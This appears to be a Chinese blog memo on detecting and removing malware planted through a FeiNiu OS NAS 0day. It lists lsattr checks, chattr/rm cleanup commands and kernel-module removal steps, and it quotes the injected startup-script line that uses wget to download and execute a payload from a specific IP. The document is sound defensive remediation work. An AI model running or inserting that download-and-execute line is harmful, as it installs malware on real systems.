26.1 飞牛OS 0day 漏洞自查和修复备忘
查无此亍
2026年01月31日 19:50
飞牛Nas

ssh连入飞牛OS,su登录root,依此执行以下三个命令

lsattr -Ra /usr > attr 2> /dev/null

grep '\-i-' attr

lsattr -Ra /etc > attr2 2> /dev/null

grep '\-i-' attr2

如发现以下带i和e的文件表示系统已经被植入病毒

----i---------e------- /usr/bin/nginx

----i---------e------- /usr/trim/bin/trim_https_cgi

----i---------e------- /usr/sbin/gots

----i---------e------- /etc/systemd/system/trim_https_cgi.service

----i---------e------- /etc/systemd/system/nginx.service

----i---------e------- /etc/rc.local

由于被加上了不可修改属性需要先用命令解除然后删除

代码块
PlainText
自动换行
复制代码
chattr -i /etc/systemd/system/nginx.service
rm /etc/systemd/system/nginx.service
chattr -i /etc/systemd/system/trim_https_cgi.service
rm /etc/systemd/system/trim_https_cgi.service
chattr -i /etc/rc.local
rm /etc/rc.local
chattr -i /usr/sbin/gots
rm /usr/sbin/gots
chattr -i /usr/bin/nginx
rm /usr/bin/nginx
chattr -i /usr/trim/bin/trim_https_cgi
rm /usr/trim/bin/trim_https_cgi
复制成功

检查/usr/trim/bin/system_startup.sh

代码块
PlainText
自动换行
复制代码
vim /usr/trim/bin/system_startup.sh
复制成功

如果最后一行有wget则代表文件被修改

代码块
PlainText
自动换行
复制代码
rm -rf /var/tmp/trim-update
rm -rf /var/tmp/update-*

wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
复制成功

将光标移动到最后一行按两下键盘d键删除该行

输入:wq保存退出

检查内核模块:

代码块
PlainText
自动换行
复制代码
cat /etc/modules
复制成功

如果最后出现了snd_pcap,表示已经被植入内核模块

代码块
PlainText
自动换行
复制代码
# /etc/modules: kernel modules to load at boot time.
#
# This file contains the names of kernel modules that should be loaded
# at boot time, one per line. Lines beginning with "#" are ignored.
# Parameters can be specified after the module name.

bonding
msr

snd_pcap
复制成功

执行命令卸载内核模块

代码块
PlainText
自动换行
复制代码
modprobe -r snd_pcap  || rmmod -f snd_pcap 
depmod -a
复制成功

重启后再次检查是否有恶意文件生成,system_startup.sh是否被篡改